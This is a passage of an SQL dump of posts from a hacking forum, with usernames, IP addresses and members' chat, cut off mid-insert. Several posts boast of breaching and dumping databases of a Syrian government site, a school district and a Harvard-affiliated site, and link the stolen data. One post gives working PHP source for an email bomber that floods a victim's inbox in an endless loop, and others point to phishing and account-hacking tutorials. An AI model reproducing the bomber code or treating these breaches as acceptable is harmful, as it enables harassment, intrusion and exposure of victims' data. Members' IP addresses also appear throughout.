`edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3462', '505', '2523', '53', 'RE: Complete Java Guide', '0', '222', 'Exposé', '1349464158', 'Thanks for this guide...I\'m just learning java so it will be good :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '40fcdf2a38e1f90ea89c0a0e31984662', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3463', '238', '1021', '56', 'RE: Ban the user above you', '0', '222', 'Exposé', '1349464221', 'Banned for starting this gay thread....:P jk jk jk :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '2e044afcf4a408a7fb43329c02766704', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3464', '680', '3457', '35', 'RE: Some of my works...', '0', '222', 'Exposé', '1349464561', 'Thanks :D....I will upload more when I do them :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '1828ceae9f9ab3a5a8245615c22a04d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3465', '43', '105', '7', 'RE: How did you find us?', '0', '222', 'Exposé', '1349464807', 'Someone sent me a pm saying I should join the site :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '953acd3e24eb43c508ff7f72052483ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3466', '681', '0', '49', 'Chatbox....', '0', '222', 'Exposé', '1349464870', 'You guys ever think to add a chatbox...Idk might be nice :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '717f041c6ad152a2b6944396fc47a28f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3467', '681', '3466', '49', 'RE: Chatbox....', '0', '82', 'iTzIpod', '1349465103', 'They already made a thread that was stickied about Chatboxes. Right here. http://l33thacking.net/thread-119.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2e33747a7be3a49636e5dc4808329675', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3468', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '219', 'kaitlin', '1349465176', 'Hello yeah it\'s me eg Kaitlin AK from Ubers <----- Ak evil child', '94.0.65.178', '1577075122', '0', '0', '0', '0', '1', '63cb5bcc1f3992198c5002be3346c113', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3469', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349465237', '51 is the next number.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '092fc88b60781362ab96cf2c6af0b168', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3470', '679', '3449', '4', 'RE: flamingworm here!', '0', '82', 'iTzIpod', '1349465283', 'Welcome to LH bro! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '79b69809720198443cba32c3e1505032', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3471', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '222', 'Exposé', '1349465296', 'Maybe if you had other text or something in the middle it would be fine, but as users said above empty space is never good. So either make it smaller or add something to it..', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '274ba7cf036be85e7ed906adb0102cf8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3472', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349465321', 'I think he left. Hope he doesn\'t come back. Unless he makes that $$ Contest', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7088964e51801c8715ad8253eaa2b958', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3473', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349465352', ':o Banned for having 2 emotes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c9288ee28d39f43ffff8a14af892ca5f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3474', '680', '3457', '35', 'RE: Some of my works...', '0', '82', 'iTzIpod', '1349465416', 'They all look really good. :D You\'re really good. @t3h jok3r, it\'s Kremlin Bolshevik (Font) Same one we all use.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a6b8d0815492522502ba72d3fe68fb14', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3475', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1349465451', 'Welcome to the forum everyone.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1373374f9c53d84f550a476a6ae16dec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3476', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349465486', 'Thanks...and is SE content allowed on LH? I\'m an experienced SE\'r and I can release tons of unique methods....', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '6828a712c25445f1ec04993098c985e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3477', '594', '2868', '64', 'RE: Noobroom (Online Movie Streaming Site)', '0', '82', 'iTzIpod', '1349465526', 'Should I sticky this thread @t3h jok3r?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'af8a8834ded3be0d51cce9ec03197a93', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3478', '682', '0', '49', 'Hmm', '0', '219', 'kaitlin', '1349465888', 'Ok im going to be very open minded. I have only just joined this forum and i dont like the layout or theme. Also from looking around i dont really see no hacking threads nor do i see much tools extra. All im seeing is a play ground TBH so whats going to be added i know forums new i know the admin. Im just saying i dont like the playground', '94.0.65.178', '1577075122', '0', '0', '0', '0', '1', '1465ed76b2035c85e2d2a70dd1eb793d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3479', '682', '3478', '49', 'RE: Hmm', '0', '1', 't3h jok3r', '1349469532', 'Thanks for the feedback. L33THacking is a new forum, you can\'t expect us to have HQ and legit 10,000 threads under 2 months. We are building and when it comes to \"no hacking\" threads, we have 37 tutorials and 31 programs in the \"tools & programs\" section. The best is not always for free, some upgraded members stay active in the VIP section and if you are active and help the community then you can join the Unique group. In the unique group, there\'s like 1-4 new threads everyday and they either are tutorials or program giveaway. Websites such as HF should be considered playground because they don\'t have much BH discussions unlike L33THacking, we have phishing forums, PIDs, Movie Rips and more. Could you please elaborate what you mean by \"playground\"?', '72.231.24.165', '1223104677', '1', '0', '1', '1349469662', '1', '1c9fc0d257f85c5df310cefac4a94f34', '0', '1349469662'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3480', '594', '2868', '64', 'RE: Noobroom (Online Movie Streaming Site)', '0', '1', 't3h jok3r', '1349469741', 'Honestly I don\'t know if this should be stickied or not but just do it because this site contains all the movie links.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e297d69b96534099fcda6a628218257f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3481', '680', '3474', '35', 'RE: Some of my works...', '0', '1', 't3h jok3r', '1349470342', '[quote=\'iTzIpod\' pid=\'3474\' dateline=\'1349465416\'] They all look really good. :D You\'re really good. @t3h jok3r, it\'s Kremlin Bolshevik (Font) Same one we all use. [/quote] Lol The letter \"M\" looked different.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2233e83b89a6fbe208e98a3267e10808', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3482', '679', '3449', '4', 'RE: flamingworm here!', '0', '82', 'iTzIpod', '1349472565', 'Yes it is. We have a SEing Section in the Hacking Tab', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '43e555d143b6a46a01ba2612f61de713', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3505', '685', '0', '13', '[HACKED] http://www.mahrukat.gov.sy/ database dump', '0', '223', 'StarZ', '1349474733', 'I downloaded BackTrack 5 R2 and had a little fun, enjoy. And if you\'re wondering why it says \'Areses\', well that\'s the name I was using on HackForums so I don\'t get banned again. :3 Dump: http://pastebin.com/qUqd40HZ', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', 'bdc278c9e677e20f1cd53c515f186e73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3484', '594', '2868', '64', 'RE: Noobroom (Online Movie Streaming Site)', '0', '82', 'iTzIpod', '1349472627', 'Can you sticky this for me then?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '995c595cb88860368c72003267658e3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3485', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1349472665', 'Banned because I\'m sad today', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '108f8337c3e2acfff4277ce14128a14e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3486', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1349472715', '/me tells Ipod to to to to [spoiler] Message me I\'m bored [/spoiler]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6af9484eea7d9c7ed9754bc08f3abe33', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3487', '682', '3478', '49', 'RE: Hmm', '0', '82', 'iTzIpod', '1349472758', 'By playground, I\'m guessing he means like we just post. Instead of posting threads related to hacking. We get most of our posts from the Forum Games section. But we can\'t do anything about that..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f243fa8ad91a553a9ece866b9eccdfa4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3488', '682', '3478', '49', 'RE: Hmm', '0', '1', 't3h jok3r', '1349472817', 'It\'s a she, I think she is the first female on LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3c3cda3422555e8cc8362e8cd4ea74a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3489', '683', '0', '61', '[Request] Twitter Bot?', '0', '82', 'iTzIpod', '1349472888', 'Does anyone have a confirmed working Twitter bot? I need a Twitter Follower/Unfollower bot. Just so that I can get a couple followers more than someone I know. Thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e3abeb9d99b0eb44e0b2389aede982c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3490', '682', '3478', '49', 'RE: Hmm', '0', '82', 'iTzIpod', '1349472952', 'Oh well. All I could say is Welcome to L33tHacking.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4fd073b0f3c8b43aad9a5b040046462f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3491', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349472991', 'Banned because I\'m pissed off today.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ff91a4d0893756753b2e94f51731edb2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3492', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1349473021', '/me is pissed off today. And tells t3h jok3r to go on Skype. Also, I gotta go now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '44858d6a42b5472954190977ef2e497b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3493', '673', '3423', '29', 'RE: The only allowed \"how to deep web\" tutorial here.', '0', '5', 'Timmy', '1349473036', '[quote=\'Apathy\' pid=\'3423\' dateline=\'1349410414\'] A nice tutorial. Thanks for the share. :) [/quote] Did yo give this a try?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5f47df7bcf331f8795b65710baef16cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3494', '673', '3410', '29', 'RE: The only allowed \"how to deep web\" tutorial here.', '0', '203', 'NeonLights', '1349473059', 'WOW THIS IS FUCKING HARDCORE SHIT MAN! D:', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'dba0941ab205fbef2f0a2484c7882c05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3495', '190', '665', '56', 'RE: Copy and paste game', '0', '5', 'Timmy', '1349473072', 'https://www.facebook.com/pages/create.php?ref_type=sitefooter', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4b1a77d4bf98a1d996a496bffbee7e27', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3496', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '5', 'Timmy', '1349473282', 'Thanks it worked. Why does my PC detect the deface builder as a threat but virustotal doesn\'t detect anything?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a4bbad1a310afdf7c8ce65f80fd2f871', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3497', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '5', 'Timmy', '1349473419', 'I did this before but failed like Baws.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd5f9b7f92a467a5b09f580ad3311b270', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3499', '77', '2236', '16', 'RE: Disguise your voice over Skype', '0', '12', 'jonas83', '1349473907', '[quote=\'iTzIpod\' pid=\'2236\' dateline=\'1347910574\'] Works really well. Thanks for telling me about Clownfish. =] Good for SEing via Skype Calling [/quote] Best part is that this has too many features and all are free.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '48bf6a56a39d5728aae19c41e10666ce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3500', '680', '3457', '35', 'RE: Some of my works...', '0', '12', 'jonas83', '1349473995', 'It\'s lower case and @OP nice work. What program do you use?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7443af6247134c30df1bf5f98f263959', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3501', '684', '3498', '19', 'RE: Webtools - CF Resolver / Email Spoofer / Ping / Skype Tools & more', '0', '100', '??zg???g????61', '1349474057', 'Nice share thanks for the download ;D', '70.192.15.83', '1186991955', '1', '0', '0', '0', '1', 'fbed3bbd14db94ba0079a4bd065e280d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3502', '117', '296', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '12', 'jonas83', '1349474161', 'Should i uplad this to public html', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4faec34ea23b88375a682fc2d7d4b404', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3503', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '100', '??zg???g????61', '1349474238', 'Cool tutorial thanks. I might try this out', '70.192.15.83', '1186991955', '1', '0', '0', '0', '1', 'a35e2854ba3ca5d650cbbec61c405797', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3504', '77', '184', '16', 'RE: Disguise your voice over Skype', '0', '100', '??zg???g????61', '1349474291', 'Awesome but is this for Mac?', '70.192.15.83', '1186991955', '1', '0', '0', '0', '1', '9e27859af4b02e3fa6c1ab7e69b29e45', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3506', '686', '0', '13', '[HACKED] www.piedmont.k12.ca.us database dumped :3', '0', '223', 'StarZ', '1349474767', 'It took me months to successfully hack it. I was a skid at the time when I was attempting to hack it. Now that I\'ve advanced I finally got around to dumping the databases. Dump: http://pastebin.com/XCErL39k', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', '048016b25cdb420d2d227870bb8f2255', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3507', '687', '0', '13', '[HACKED] mclean.harvard.edu', '0', '223', 'StarZ', '1349474800', 'I successfully hacked them and dumped all of their databases, I didn\'t bother trying to login and deface it, though. Maybe someone else will get lucky. Dump: http://pastebin.com/aZPrnD0x', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', '899d5918c90ddf51b405dd05967d4eb1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3508', '688', '0', '67', '[PHP] Email Bomber Source', '0', '12', 'jonas83', '1349474965', '[code] ?php $vic = htmlentities($_POST[\'vic\']); $subject = htmlentities($_POST[\'subj\']); $message = htmlentities($_POST[\'mes\']); $from = htmlentities($_POST[\'from\']); $sub = $_POST[\'sub\']; $all = \"$vic$subject$message$from\"; $i = 1; if(!empty($all) && isset($sub)){ do { mail($vic, $subject, $message, \"From: \".$from); } while ($i > 0); } else if (empty($all) && isset($sub)){ echo \'Please enter all fields!\'; } ?> <form action=\"#\" method=\"POST\"> Victim: <input type=\"text\" name=\"vic\"><br> Subject: <input type=\"text\" name=\"subj\"><br> Message: <input type=\"text\" name=\"mes\"><br> From: <input type=\"text\" name=\"from\"><br> <input type=\"submit\" name=\"sub\" value=\"Bomb!\"> </form> [/code]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '023973c5087e1de05848490cd00a446b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3509', '77', '184', '16', 'RE: Disguise your voice over Skype', '0', '12', 'jonas83', '1349475101', 'I think it supports Mac but give it a try.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8d0d9a58237d8684d00b413965952a82', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3510', '63', '149', '23', 'RE: [Guide] - Keylogger Information & Removal - [Guide]', '0', '12', 'jonas83', '1349475145', 'Thanks guys for the appreciation. Good Luck staying safe.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ba2cf56bc541f48b473be532b769c6c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3511', '689', '0', '19', '[Junk]Test', '0', '8', 'spacefish36', '1349475259', 'Junk this thread please. This is a test upon jok3rs request', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a884f9337ce8b6675d6cfdb51b502140', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3512', '687', '3507', '13', 'RE: [HACKED] mclean.harvard.edu', '0', '9', 'p420', '1349475609', 'Nice hacks. You seem to be a pro web hacker. I bet someone will upload a deface but why don\'t you?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '87ba279d40fe819059ecfec0286fb445', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3513', '688', '3508', '67', 'RE: [PHP] Email Bomber Source', '0', '100', '??zg???g????61', '1349475739', 'As shit thanks bro I\'m puttin this on my site now', '70.192.15.83', '1186991955', '1', '0', '0', '0', '1', '03ecba9e2593ddada6d93a08cef539d1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3514', '687', '3512', '13', 'RE: [HACKED] mclean.harvard.edu', '0', '223', 'StarZ', 